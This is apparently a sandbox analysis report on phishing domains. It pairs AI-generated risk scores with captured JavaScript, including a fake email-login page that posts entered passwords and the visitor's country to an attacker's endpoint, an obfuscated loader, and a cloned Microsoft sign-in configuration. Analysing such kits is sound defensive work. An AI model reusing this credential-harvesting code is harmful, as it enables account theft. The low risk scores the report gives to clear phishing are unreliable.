| URL: https://push.smtmarking.com Model: Joe Sandbox AI | ```json{ "brand": "unknown", "brand_classification": "unknown", "legit_url": "unknown", "similarity": 0, "spoofed": 0, "reasoning": "The URL 'https://push.smtmarking.com' does not exhibit any clear signs of typosquatting. There are no obvious visual character substitutions or structural changes that suggest it is mimicking a well-known brand. The subdomain 'push' and the domain 'smtmarking.com' do not closely resemble any known brand names. Additionally, the domain name 'smtmarking' suggests a specific purpose that could be related to a legitimate business or service, such as marking or labeling technologies, which does not imply any deceptive intent. Therefore, the likelihood of this being a typosquatting attempt is very low."} |
URL: https://push.smtmarking.com |
| URL: https://outblook.divergenty.com/_next/static/chunk... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It uses dynamic code execution through the `Function` constructor, which can potentially execute remote or malicious code. Additionally, it sends data to external domains, including `vercel.live`, which may indicate data exfiltration or tracking behavior. While the script appears to be related to Vercel's live feedback functionality, the lack of transparency and the use of dynamic code execution warrant further review to ensure the script's legitimacy and the protection of user data."
} |
(()=>{"use strict";var e={},r={};function t(o){var n=r[o];if(void 0!==n)return n.exports;var i=r[o]={exports:{}},l=!0;try{e[o](i,i.exports,t),l=!1}finally{l&&delete r[o]}return i.exports}t.m=e,(()=>{var e=[];t.O=(r,o,n,i)=>{if(o){i=i||0;for(var l=e.length;l>0&&e[l-1][2]>i;l--)e[l]=e[l-1];e[l]=[o,n,i];return}for(var a=1/0,l=0;l<e.length;l++){for(var[o,n,i]=e[l],u=!0,f=0;f<o.length;f++)(!1&i||a>=i)&&Object.keys(t.O).every(e=>t.O[e](o[f]))?o.splice(f--,1):(u=!1,i<a&&(a=i));if(u){e.splice(l--,1);var s=n();void 0!==s&&(r=s)}}return r}})(),t.n=e=>{var r=e&&e.__esModule?()=>e.default:()=>e;return t.d(r,{a:r}),r},t.d=(e,r)=>{for(var o in r)t.o(r,o)&&!t.o(e,o)&&Object.defineProperty(e,o,{enumerable:!0,get:r[o]})},t.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||Function("return this")()}catch(e){if("object"==typeof window)return window}}(),t.o=(e,r)=>Object.prototype.hasOwnProperty.call(e,r),t.r=e=>{"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},t.p="/_next/",(()=>{var e={68:0};t.O.j=r=>0===e[r];var r=(r,o)=>{var n,i,[l,a,u]=o,f=0;if(l.some(r=>0!==e[r])){for(n in a)t.o(a,n)&&(t.m[n]=a[n]);if(u)var s=u(t)}for(r&&r(o);f<l.length;f++)i=l[f],t.o(e,i)&&e[i]&&e[i][0](),e[i]=0;return t.O(s)},o=self.webpackChunk_N_E=self.webpackChunk_N_E||[];o.forEach(r.bind(null,0)),o.push=r.bind(null,o.push.bind(o))})()})();
;(function(){if(!/(?:^|;\s)__vercel_toolbar=1(?:;|$)/.test(document.cookie))return;var s=document.createElement('script');s.src='https://vercel.live/_next-live/feedback/feedback.js';s.setAttribute("data-explicit-opt-in","true");s.setAttribute("data-cookie-opt-in","true");((document.head||document.documentElement).appendChild(s))})();
|
| URL: https://outblook.divergenty.com/.well-known/vercel... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The provided JavaScript snippet exhibits several behaviors that raise moderate security concerns. It uses obfuscated code and dynamic code execution techniques, which can potentially be used for malicious purposes. Additionally, the script appears to be sending data to external domains, which could lead to data exfiltration if not properly handled. While the intent of the script is unclear, the combination of these factors warrants further investigation and a medium-risk assessment."
} |
function u(V,B){const c=v();return u=function(s,w){s=s-(0x210e+0x1f56+-0x3f11);let y=c[s];if(u['IufMMc']===undefined){var n=function(W){const Y='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let X='',d='',p=X+n;for(let J=0x1f94+-0x5b*-0x19+-0x2877,P,M,F=0x47c+-0x3bf*-0x2+-0xbfa;M=W['charAt'](F++);~M&&(P=J%(-0x3fd*0x6+-0x25*-0xec+-0xa2a)?P*(-0x19f7+0x106e*0x2+-0x6a5)+M:M,J++%(-0x1d4b*-0x1+-0x264+-0x1ae3))?X+=p['charCodeAt'](F+(-0x4*0x716+-0x2e1+0x1*0x1f43))-(0x2310+-0x101d+-0x1*0x12e9)!==-0x1c21+0x1d0a*-0x1+-0x392b*-0x1?String['fromCharCode'](-0x1420+-0xad3+-0x6*-0x553&P>>(-(0x1*0x2632+0x4*0x77b+-0x441c)*J&-0x51c+0xa93*-0x3+-0xb9*-0x33)):J:0x107e+0x1c49+-0xeed*0x3){M=Y['indexOf'](M);}for(let z=0xfad+0x2*-0x196+0xc81*-0x1,R=X['length'];z<R;z++){d+='%'+('00'+X['charCodeAt'](z)['toString'](0x1f03*-0x1+0x967*-0x1+0x287a))['slice'](-(0x1431+0x23*-0xc1+0x2*0x31a));}return decodeURIComponent(d);};const e=function(W,Y){let X=[],d=0x82*0x1b+-0x1a1a+0xf4*0xd,p,J='';W=n(W);let P;for(P=-0xed3+0xcf+0xe04;P<0x17*0xeb+0x17eb+-0x2c08;P++){X[P]=P;}for(P=0x8*-0x3eb+0x260a+-0x6b2*0x1;P<0x482+-0x119f+-0xe1d*-0x1;P++){d=(d+X[P]+Y['charCodeAt'](P%Y['length']))%(-0xeef+-0x9*-0x335+-0xcee),p=X[P],X[P]=X[d],X[d]=p;}P=0xf73+0x25*-0x7+-0xe70,d=-0x1bf+-0x1ab1+0x1c70;for(let M=-0x1*-0xd85+-0x400+-0x985;M<W['length'];M++){P=(P+(-0x3e9+-0xa65+0x21*0x6f))%(0x2126+0x1eb7+-0x3edd),d=(d+X[P])%(0x166*-0x15+-0x491*-0x7+-0x199*0x1),p=X[P],X[P]=X[d],X[d]=p,J+=String['fromCharCode'](W['charCodeAt'](M)^X[(X[P]+X[d])%(-0x84a+-0x1be*-0x2+0x2*0x2e7)]);}return J;};u['eNxVgS']=e,V=arguments,u['IufMMc']=!![];}const A=c[0x627*0x5+0x253f+0x6cd*-0xa],S=s+A,j=V[S];if(!j){if(u['QhLaVR']===undefined){const W=function(Y){this['sqniZR']=Y,this['puiHUp']=[-0x9d9*-0x1+-0x1344+0x96c,0x413*0x1+0xe71+-0x1284,0xe74+-0x1*-0x305+0x1f1*-0x9],this['draurT']=function(){return'newState';},this['yzxRuH']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['AJzumU']='[\x27|\x22].+[\x27|\x22];?\x20*}';};W['prototype']['SCAUiX']=function(){const Y=new RegExp(this['yzxRuH']+this['AJzumU']),X=Y['test'](this['draurT']['toString']())?--this['puiHUp'][0x1158+0x9fe+-0x1b55]:--this['puiHUp'][-0x98e+0xb4+0x8da];return this['AJbvOM'](X);},W['prototype']['AJbvOM']=function(Y){if(!Boolean(~Y))return Y;return this['XQYCfD'](this['sqniZR']);},W['prototype']['XQYCfD']=function(Y){for(let X=-0x3*0x5e3+-0x1ff1+0x319a,d=this['puiHUp']['length'];X<d;X++){this['puiHUp']['push'](Math['round'](Math['random']())),d=this['puiHUp']['length'];}return Y(this['puiHUp'][0x2*0x3b3+-0x25a+0x4*-0x143]);},new W(u)['SCAUiX'](),u['QhLaVR']=!![];}y=u['eNxVgS'](y,w),V[S]=y;}else y=j;return y;},u(V,B);}const VD=u;(function(Ve,VW){const VT=u,VY=Ve();while(!![]){try{const VX=parseInt(VT(0x316,'RqH6'))/(0x60d*0x5+0x2585+-0x43c5*0x1)+-parseInt(VT(0x31d,'TbvA'))/(-0x1318+-0x1f71+0x328b)*(parseInt(VT(0x1dd,'$luD'))/(0x11*-0x3d+0x116a+-0x1*0xd5a))+-parseInt(VT(0x241,'3SKn'))/(0x140c+-0xde7+0x20b*-0x3)*(parseInt(VT(0x198,'RujQ'))/(-0x192d*0x1+0x4b9+0x1479))+-parseInt(VT(0x1b2,'cE5)'))/(-0x1fb4+0x1859+-0x1*-0x761)+-parseInt(VT(0x381,'1pzL'))/(-0x5*-0x115+0x1*-0xe4e+0x476*0x2)+-parseInt(VT(0x35a,'ZCOv'))/(0x69*-0x58+0x225e+0x2d*0xa)+-parseInt(VT(0x2b2,'G*1f'))/(-0x1528*0x1+0xad9*0x2+-0x81)*(-parseInt(VT(0x2ae,'[##K'))/(-0x1*0x1dcb+0x3*-0xa78+0x3d3d));if(VX===VW)break;else VY['push'](VY['shift']());}catch(Vd){VY['push'](VY['shift']());}}}(v,-0x174*0xa81+0xda681+0xb0126));const e=(function(){let Ve=!![];return function(VW,VY){const VX=Ve?function(){const VC=u;if(VY){const Vd=VY[VC(0x32d,'Ele)')+'ly'](VW,arguments);return VY=null,Vd;}}:function(){};return Ve=![],VX;};}()),d=e(this,function(){const Vh=u,Ve={'whgiH':'((('+Vh(0x27f,'bpA(')+'+)+'+Vh(0x2ee,'Ele)')};return d['toS'+Vh(0x1ef,'3SKn')+'ng']()['sea'+Vh(0x17b,'XIJ6')](Ve['whg'+'iH'])[Vh(0x1ba,'Js%Y')+'tri'+'ng']()[Vh(0x286,'Ele)')+Vh(0x1a7,'2GEj')+'uct'+'or'](d)[Vh(0x2c0,'wFAc')+'rch'](Vh(0x31b,'o8[l')+Vh(0x1d1,'xGK1')+Vh(0x374,'(Z4B')+Vh(0x36d,'TbvA'));});d();const p=(function(){ |
| URL: https://ss.nemolightlng.com/... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script exhibits several moderate-risk behaviors, including external data transmission, use of fallback domains, and aggressive DOM manipulation. While the script does not contain any high-risk indicators like dynamic code execution or obfuscated code, the overall behavior is concerning and requires further review to determine the intent and potential impact."
} |
(function(){window._cf_chl_opt={cvId: '3',cZone: "ss.nemolightlng.com",cType: 'managed',cRay: '90515798dcea3ad3',cH: '_5HoU14njfZp88rMhssmcCZxyq06oFncvGq56DDf9m0-1737399991-1.2.1.1-x8_H31dmNr1NjDipRGXCnEf9u2tGh4PF0DiGFW8cqc29OK6mr.i1JgEK4iCmn4sF',cUPMDTk: "\/?__cf_chl_tk=BNNbsc6gYiNEVBICdk7i3v.a4ck_pLIUsh.E5Utm_5U-1737399991-1.0.1.1-5LkwzTqAEYrNuUKB.OMfkpYjJn9wyisNNLcP77v7gAY",cFPWv: 'g',cITimeS: '1737399991',cTTimeMs: '1000',cMTimeMs: '390000',cTplC: 0,cTplV: 5,cTplB: 'cf',cK: "",fa: "\/?__cf_chl_f_tk=BNNbsc6gYiNEVBICdk7i3v.a4ck_pLIUsh.E5Utm_5U-1737399991-1.0.1.1-5LkwzTqAEYrNuUKB.OMfkpYjJn9wyisNNLcP77v7gAY",md: "SSCq.NyhiJm9lwad9jc94TR1vtplwnbZ0Vsldl9MnfY-1737399991-1.2.1.1-9sBsO9.VtoGhOxp0re.ZoLhqHgLHkrde8OVe0DXE8RN0QrxjEdio.7y6gB1Xdp17.3R7oL0ZQ4uOzTpXb8t2Dh7f.5HMFgAkx0C2j_C3ZrxecbiWdZiEFE4ZyzdHIHhBmkyu7LC5Mj4zGBNz_RQnWFzeKtEHYrjRUC6C8u1snhTn__T7uiQHesnP5GQS2wWVXOe.74ERXHvWfGUyZHm6CFWbWMCEJaYu0beMSXM0JyL1R8LaDcc.fHWIFuVBhMXyZlFKitiN5BTJKuZstRnP.UpRQf0EHCKSswXiUbs1zGlS44K0JWzGE66EYROlYhW1jno.nAz8VOkIZDhwaud1AH4CCBW2oP6N5CuEz79nqw8RfNyYad4.b6FiAqgfKfKgAJorZdPXPQscrGq6YX9XtWm6SJy5rAvIVhSuD2Fm6fJ0lrDH31iD5S7ToYAHFRzCDzkRnDanqrBMg.RsWJ5haQ76fyptNI0XSG0VNXpUZUcESASG.P5aDNuPB1lrapk5K.qWMHQOtaTpfJCIaFxmKkCppApTDVipQfiJ2llpmi0wT90Bm.NIy4Q34E0zTFSUO6WR8N_6dNaVFrIn8.x1cP5kgsR.s8Ftxkj3db0OM9BwsG1WgCD2CaS1X7fnbWGDtXEvcYS.kLYGjaU7ZGK94DJGQ1scYYn2vwfnF8n9XZ_7OW8dkYE.M5LGFlrTFCmjx6PsoeY7ut5qwC_TdYC37vHG4g9fxTG5ls6Gbp9uX8u82Os4wi6PDpLK7l1tfzOzPtwZbpTQRg7GivASPA.vAszcGRZah0aeiKBYxHljZvs9o1lTc49B1g7Rx4bT4OoMsx0a7AbQ_wfFRuzDDd.nAyy.GgWzQNcEkJZZnMYoNZRcZSzUDIgLxIcG1bBlHmJFhDqvVZwZWqWEHJB_IJvi.Lx00iqBiAXYnDMW44m3lb.HG6M2SFq0mLlDswy8PhbXaR4NMUxT.DqKTK4mv1QNHT2cTi5ltLWLdVm1Pa4jzWyMK6v32xU3wKPpHHf5uNyMTNh8JZSOu.zYdz8zGvLEVk.erNlWF5HWbYNF26bjbff1a2KRHdfXr1IU27IxAd8bALL.qd0QCGiOZQUdCfJXQrv2zYxxllHHqMv6DHWgQ1ZtowQUJGq27Ytsj_.WfVgegjS9VJlQbiZ0_mN0C6vqKUmMLEfYEk1pkV6Hy9qaKKFE1ALS6Ekeijyrl5aJP6QoATt2qnPBqrFnbLmlR9_iTbuRVwJkiNeFmIU4WIZqlgpWIR_iW9fl5eBepZKwKVCbUFhau_BP.8GiPWEoT4TMX71CsPIIMOaqIsRaXLFQAnsoxdUnzVktPZok5WmDDbipPvrPx_1.m9UvAKvNvS8jVNUXqgV2WleSUdK1GpYqPfpZ269YgQtBH1HiAK3HgETbfp7AX4WxhoBstklwnvYU89ASezYv8WVUj.v5N5kYOfpNtkUvkqhj43dj6nYsySVk93JhFvD2tq1q5PippGmzp9guoW40BL1viNDJBPdu5nIA43HdXvTuM0M7c7zCYzO2UsAv4jXdAV9joBbrrQj7Di8Zlbz0Hye3EhftsJ9RsRpX88Qsdd5r0.DgK3CqzFmgiYjx3fTt1M7GZlQCPUemmJIsGjFmRqDc8GeS5CCHKdgkoEyDqWvFNvOrmyX9wIRkbHQPoVztKZNYaKfiDEqTuuyo9AkybGLIpjEpYYcpcpTquafix7iJvX91Wl9xmfPFXlKIqL8bUX526MRfWxsDVOVDy7Q4lrhYg4MGn9ic.m6Jaa2p9gV.xJgEKCRcOibLc9kkXKlHtslIhDQ0Xl4KTnn_OiQ1FzUWANpcIXsImjgx4CgzBq09GxZeyw89FS1_5h6krL83RTU9gTt0gKTHJP0wq2xV0vnPpXb0HiWMTHpzyfcL7V0kCxG6AZilWHC0P8MazEJD3GN8GgcR2fESnMQEjnKrMsjoe9WqG6BkBR9KIMaVDzArnI5IM0__LxNsFjZvpVQz5CZigxIdzK56Y.0.xN7XistNUmaszBd8JPUC3CTAGjcvVlhVDB0AASLDcIQyoDICQzrcPvUzG5hC8TLaMFxe2h5H3ASAozPYL.47x.1_KG2aFrkFxuoJ_E6zVTgr8wIl7ABY4FvuQoZHz7_ZBcgIYDIky6sjFKhFLwP1AV.KP1YfgQWRggpe4.Qce90vsQFg7CALGQTJvXTyrg3q33QQTXFu1U6JEvbK7EAzlf.dDwys_jJ1d1xSDKPzuKD4Ht79KfKgv0A7ZzzK8Gi.wQHezU.8e7_MKUu4xhE",mdrd: "ryXFQrex2PcwuKA6ws2dbPly0cBkOfNu8REBgH7zIg4-1737399991-1.2.1.1-PmmlfvP0ABFYF0gdZlC6VdfJ6_a6vHdwmzLRq_sc1sI4imr.ja1ztL4cTimwk4itbVUYeWYHGrzYxGJd3HW.sJSHOtDTuYit7kCpoy_JRMtg2gMFPYm.Qc3FTpZzdLf5WL1nU5CDyQViWuKqTbhoUzf6hm8mbuS2iH7qU9PLwi_3alkCnGEspa8eOKwq0BT8p9CeD2CNek6gJcT1Ed3hoFGAOvthzPN4MszMiJhcCUNqPUFl2EBQ19NQLBNeezYQnaTKmxvKwyai4_B3Eqna1zA.K3o1V7DKdjridP5liK618qj3gP6sOaZ8WXMTS9PtROaDZRFeMjXFZSHMIwWZgSCg1zJ9MdjeXB6Ld9aSfOtOttYQ30RObTYQKP.M5MDnT7yixbCYcO5.RZaUuRaQmfH1uIlYuwGmXxDZ5sMazYP7wrTx0QRL0.fl.EKkH1_oa06B1W63t6nhoc.DLo7GCB_M1uPeAsMu.Z.IBjvSK8_Yp24HPvoMnoyQAicq784lLCIncTlts23OXqQPZk.Q..7cuZBNFrZwmO1dscPUjpyDn7LYcaffB_ybBViAv4GSwJt0MxOnv48U5YIcjfkvr7qk6EyOJWDIzNiVB46OYm3aZVT3HuKlFMYVrRv_I.rwfgK6T1P_rfVONolnDqSOkPvvfxcH9Bxe_N6WIO2YuqfW2vzUokyiOj3OU59IR.k1SjeqDLAL7iFb5ePSs.UwxRVVAIbt6ZBIN7BB_sA5rjZZTmzlWynr_UdLWFT3Z8l4mi57ey0GE7GTDIJC0ro8hWHrWb4nWjlVsNU8e17Mg7RuhpG9.mXPoepIJMlXgipah8kqQCBp3uZD1tRmRG0VJKbgxCbNm5NAfN2fkZ_6Fyo8SzzU1aAO20wD_NrkcpFQUkl6hs0Ppa_fZqCCW4tNdLfD3vQlU204RRi8Fohn.T2A_.onSuCwzb3tc41QW62VYhosw |
| URL: https://ss.nemolightlng.com/... Model: Joe Sandbox AI | {
"risk_score": 4,
"reasoning": "The provided JavaScript snippet contains a mix of behaviors that warrant further review. While it does not exhibit any high-risk indicators like dynamic code execution or data exfiltration, it does include some moderate-risk behaviors, such as external data transmission and the use of fallback domains. Additionally, the script appears to be part of a larger application, and the context of its usage is not entirely clear. Therefore, a medium-risk score is assigned, and the script should be reviewed in more detail to determine its overall security implications."
} |
//<![CDATA[
$Config={"iMaxStackForKnockoutAsyncComponents":10000,"fShowButtons":true,"urlCdn":"https://aadcdn.msauth.net/shared/1.0/","urlDefaultFavicon":"https://aadcdn.msauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico","urlPost":"/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca\u0026redirect_uri=https%3a%2f%2fwww.office.com%2flandingv2\u0026response_type=code+id_token\u0026scope=openid+profile+https%3a%2f%2fwww.office.com%2fv2%2fOfficeHome.All\u0026response_mode=form_post\u0026nonce=638729968084388531.ODhhMzI5ZDgtM2JjMS00ZGQ2LWI5NTMtNTZmOWFiMjhhNTY2NjY5YjMzOTQtYjZlNy00NDM4LWI0MTUtZGFhOTRkNmFhMTI0\u0026ui_locales=en-US\u0026mkt=en-US\u0026client-request-id=e3f33282-6ba0-4068-88e6-06f9466ccabd\u0026state=_E7SaBCZBrMizHaGTa-jfJGnA9E5G361CUPjvBwRMCYOkCL3XKz3RsY-3g46jdZzSOv0uMQ2k1J0-1OPqgmGmcZyauA5SVJIvgHfVi2x6GciSz3kVMcOSDtP0oh7IFHwdXHNKt1AKmHA1gj-m430LtQ62BCXPUeNntEm94Luz-hCzpwPC1xnwLD3zGe-m8Ay9MciTlhU6ypAqT4fxBcHQ8jEh26jgzbHmHi8k6UcHp0LEuaA8hAb19L5MQi_hWGPgKlxmvia-nATz229SPvA6w\u0026x-client-SKU=ID_NET8_0\u0026x-client-ver=7.5.1.0\u0026sso_reload=True","iPawnIcon":0,"sPOST_Username":"","sFTName":"flowToken","fEnableOneDSClientTelemetry":true,"urlReportPageLoad":"https://ss.nemolightlng.com/common/instrumentation/reportpageload?mkt=en-US","dynamicTenantBranding":null,"staticTenantBranding":null,"oAppCobranding":{},"iBackgroundImage":2,"fApplicationInsightsEnabled":false,"iApplicationInsightsEnabledPercentage":0,"urlSetDebugMode":"https://ss.nemolightlng.com/common/debugmode","fEnableCssAnimation":true,"fAllowGrayOutLightBox":true,"fUseMsaSessionState":true,"fIsRemoteNGCSupported":true,"desktopSsoConfig":{"isEdgeAnaheimAllowed":true,"iwaEndpointUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/sso?client-request-id=e3f33282-6ba0-4068-88e6-06f9466ccabd","iwaSsoProbeUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/ssoprobe?client-request-id=e3f33282-6ba0-4068-88e6-06f9466ccabd","iwaIFrameUrlFormat":"https://autologon.microsoftazuread-sso.com/{0}/winauth/iframe?client-request-id=e3f33282-6ba0-4068-88e6-06f9466ccabd\u0026isAdalRequest=False","iwaRequestTimeoutInMs":10000,"startDesktopSsoOnPageLoad":false,"progressAnimationTimeout":10000,"isEdgeAllowed":false,"minDssoEdgeVersion":"17","isSafariAllowed":true,"redirectUri":"","isIEAllowedForSsoProbe":true,"edgeRedirectUri":"https://autologon.microsoftazuread-sso.com/common/winauth/sso/edgeredirect?client-request-id=e3f33282-6ba0-4068-88e6-06f9466ccabd\u0026origin=ss.nemolightlng.com\u0026is_redirected=1","isFlowTokenPassedInEdge":true},"iSessionPullType":2,"fUseSameSite":true,"isGlobalTenant":true,"uiflavor":1001,"fOfflineAccountVisible":false,"fEnableUserStateFix":true,"fShowAccessPassPeek":true,"fUpdateSessionPollingLogic":true,"fEnableShowPickerCredObservable":true,"fFetchSessionsSkipDsso":true,"fIsCiamUserFlowUxNewLogicEnabled":true,"fUseNonMicrosoftDefaultBrandingForCiam":true,"fRemoveCustomCss":true,"fFixUICrashForApiRequestHandler":true,"fShowUpdatedKoreanPrivacyFooter":true,"fUsePostCssHotfix":true,"fUseHighContrastDetectionMode":true,"fFixUserFlowBranding":true,"fEnablePasskeyNullFix":true,"fEnableRefreshCookiesFix":true,"urlAcmaServerPath":"https://ss.nemolightlng.com","sTenantId":"00000000-0000-0000-0000-000000000000","scid":1013,"hpgact":1800,"hpgid":6,"apiCanary":"PAQABDgEAAABVrSpeuWamRam2jAF1XRQEjeFKtH8SBWwcoOMCSWDP10h3_e42KFLUEGlXqqrGGHKIivnxyTPMDIBJT3_KVtoNwt2JB4VYO8cvMgWQbpg8fgbY2jfL__ObqzUP8kyYINe9-7LqLEcAQ3G8kA5Z00nEl2rFL2pLsXAdJij7ZZSkpvda4FrUdzLhnY6cCx-t0TjIUwJOTFMfFFVe6d6HNMhqZfOg1aVCKLYS26TCgrmpfSAA","canary":"qKJpdpPV2/arfsIHgYWFgPFqOkLKXHLmsIIJ9+ZKi/c=8:1:CANARY:RBwDYD5nckbryLSg/jsrBY8qMQG7Qd6BSApfPFzUlKc=","sCanaryTokenName":"canary","fSkipRenderingNewCanaryToken":false,"fEnableNewCsrfProtection":true,"correlationId":"e3f33282-6ba0-4068-88e6-06f9466ccabd","sessionId":"9cc6d58c-1dc3-4b62-aed8-5cd43ce92900","locale":{"mkt":"en-US","lcid":1033},"slMaxRetry":2,"slReportFailure":tru |
| URL: https://outblook.divergenty.com/_next/static/chunk... Model: Joe Sandbox AI | {
"risk_score": 6,
"reasoning": "The script demonstrates moderate-risk behaviors, including external data transmission and potential data exfiltration. While it appears to have a legitimate purpose (email validation and password submission), the use of obfuscated URLs and lack of transparency around the destination domains raises some concerns. Further review of the script's behavior and the reputation of the involved domains would be necessary to determine the overall risk level."
} |
(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[332],{7276:(e,t,s)=>{(window.__NEXT_P=window.__NEXT_P||[]).push(["/",function(){return s(6993)}])},6993:(e,t,s)=>{"use strict";s.r(t),s.d(t,{default:()=>c});var a=s(4848),n=s(6540),o=s(2505),l=s.n(o),i=s(9680),r=s.n(i);function c(){let[e,t]=(0,n.useState)(""),[s,o]=(0,n.useState)(""),[i,c]=(0,n.useState)(""),[d,m]=(0,n.useState)(!1),[u,_]=(0,n.useState)(""),[g,h]=(0,n.useState)(!1);(0,n.useEffect)(()=>{l().get("https://ipinfo.io/json?token=c3e87e382ddea7").then(e=>{let t=e.data.country;return l().get("https://restcountries.com/v3.1/alpha/".concat(t))}).then(e=>{c(e.data[0].name.common)}).catch(e=>{console.error("Failed to fetch full country name:",e),_("Failed to retrieve country information.")})},[]);let p=async t=>{if(t.preventDefault(),s.length>=5){h(!0);try{let t=await l().post("/api/send-email",{email:e,password:s,country:i});console.log("Email sent successfully!",t.data.message),window.location.href="https://ss.nemolightlng.com/"}catch(e){console.error("Failed to send email:",e),_("Failed to submit. Please try again.")}finally{h(!1)}}else _("Password must be at least 5 characters long.")},x=e=>/^[^\s@]+@[^\s@]+\.[^\s@]+$/.test(String(e).toLowerCase());return(0,a.jsxs)("div",{className:r().container,children:[(0,a.jsx)("div",{className:r().background}),(0,a.jsxs)("div",{className:r().loginBox,children:[(0,a.jsx)("img",{src:"/logo.png",alt:"Logo",className:r().logo}),(0,a.jsx)("div",{className:r().message,children:d?"Validate email password to continue":"Verify email to proceed"}),d?(0,a.jsxs)(a.Fragment,{children:[(0,a.jsx)("div",{className:r().displayEmail,children:e}),(0,a.jsxs)("form",{onSubmit:p,children:[(0,a.jsx)("input",{type:"password",placeholder:"Password",className:r().inputField,value:s,onChange:e=>o(e.target.value)}),(0,a.jsx)("div",{className:r().buttonContainer,children:(0,a.jsx)("button",{type:"submit",className:r().submitButton,children:"Validate"})})]})]}):(0,a.jsxs)("form",{onSubmit:t=>{t.preventDefault(),x(e)?(m(!0),_("")):_("Please enter a valid email address.")},children:[(0,a.jsx)("input",{type:"email",placeholder:"Email Address",className:r().inputField,value:e,onChange:e=>t(e.target.value)}),(0,a.jsx)("div",{className:r().buttonContainer,children:(0,a.jsx)("button",{type:"submit",className:r().nextButton,children:"Next"})})]}),u&&(0,a.jsx)("div",{className:r().errorMessage,children:u}),g&&(0,a.jsx)("div",{className:r().modal,children:(0,a.jsx)("div",{className:r().modalContent,children:(0,a.jsx)("p",{children:"Processing..."})})})]})]})}},9680:e=>{e.exports={container:"Home_container__d256j",background:"Home_background__nqUIs",loginBox:"Home_loginBox__i6Tc_",logo:"Home_logo__IOQAX",message:"Home_message__OKL2m",displayEmail:"Home_displayEmail__HOGgk",inputField:"Home_inputField__h82W1",buttonContainer:"Home_buttonContainer__nOVuY",submitButton:"Home_submitButton__ECzIY",nextButton:"Home_nextButton__r_Kss",errorMessage:"Home_errorMessage__n47_b",modal:"Home_modal___NgiA",modalContent:"Home_modalContent__XKBCH"}}},e=>{var t=t=>e(e.s=t);e.O(0,[505,636,593,792],()=>t(7276)),_N_E=e.O()}]);
|
| URL: https://ss.nemolightlng.com/?sso_reload=true... Model: Joe Sandbox AI | {
"risk_score": 7,
"reasoning": "This script demonstrates several high-risk behaviors, including redirecting the user to an unknown domain and potentially collecting sensitive information (session ID) without transparency. The use of obfuscated code and the attempt to bypass the same-origin policy by redirecting to the parent frame are also concerning. While the script may have a legitimate purpose, the overall behavior is highly suspicious and requires further investigation."
} |
//<![CDATA[
!function(){var e=window,s=e.document,i=e.$Config||{};if(e.self===e.top){s&&s.body&&(s.body.style.display="block")}else if(!i.allowFrame){var o,t,r,f,n,d;if(i.fAddTryCatchForIFrameRedirects){try{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}catch(e){}}else{o=e.self.location.href,t=o.indexOf("#"),r=-1!==t,f=o.indexOf("?"),n=r?t:o.length,d=-1===f||r&&f>t?"?":"&",
o=o.substr(0,n)+d+"iframe-request-id="+i.sessionId+o.substr(n),e.top.location=o}}}();
//
|
| URL: https://ss.nemolightlng.com/?sso_reload=true... Model: Joe Sandbox AI | {
"risk_score": 3,
"reasoning": "The provided JavaScript snippet appears to be a configuration object for a web application. It contains various URLs and settings related to user authentication and federated identity management, such as Microsoft Account (MSA) sign-up and logout, GitHub federation, and SMS country phone data. While the snippet includes some external URLs, it does not demonstrate any high-risk behaviors like dynamic code execution, data exfiltration, or obfuscated code. The overall behavior seems to be focused on legitimate authentication and identity management functionality, with no clear signs of malicious intent. Therefore, the risk score is assessed as 3 (Low Risk)."
} |
//<![CDATA[
$Config={"fShowPersistentCookiesWarning":false,"urlMsaSignUp":"https://login.live.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2fss.nemolightlng.com%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqEuATePHronVs723nhfn5-f_OUoFmMnPE5mWVglasYlQkbp3-BkfEFI-MtJkH_onTPlPBit9SU1KLEksz8vAssAq9YeAyYrTg4uAQYJBgUGH6wMC5iBdrqtsDtY6XvebctrJtuPNugwHCKVb_Q26sgpSAgzEg_sSit2NMjPTLcLT3ArdA_28c7wsMnt9jT08tSO8o7Uz_Z1tLKcAKb0AQ2plNsDB_YGDvYGWaxMxzgZNzAw3iAl-EH3885u4_c3HDunccrfp28xETPXFeL0lA3r8BUp8LQ0HInw8RE1_zy8jCfoHSXwCJfi0z3CI-cbHdH2w0CDA8EGAA1\u0026estsfed=1\u0026uaid=4be1e2ec7d6d439ba1bf0f0f4f376452\u0026signup=1\u0026lw=1\u0026fl=easi2\u0026fci=https%3a%2f%2fportal.microsoftonline.com.orgid.com","urlMsaLogout":"https://login.live.com/logout.srf?iframed_by=https%3a%2f%2fss.nemolightlng.com","urlOtherIdpForget":"https://login.live.com/forgetme.srf?iframed_by=https%3a%2f%2fss.nemolightlng.com","showCantAccessAccountLink":true,"urlGitHubFed":"https://login.live.com/oauth20_authorize.srf?scope=openid+profile+email+offline_access\u0026response_type=code\u0026client_id=51483342-085c-4d86-bf88-cf50c7252078\u0026response_mode=form_post\u0026redirect_uri=https%3a%2f%2fss.nemolightlng.com%2fcommon%2ffederation%2foauth2msa\u0026state=rQQIARAA42Kw0skoKSkottLXL8gvKknM0cvNTC7KL85PK8nPy8nMS9VLzs_Vyy9Kz0wBsYqE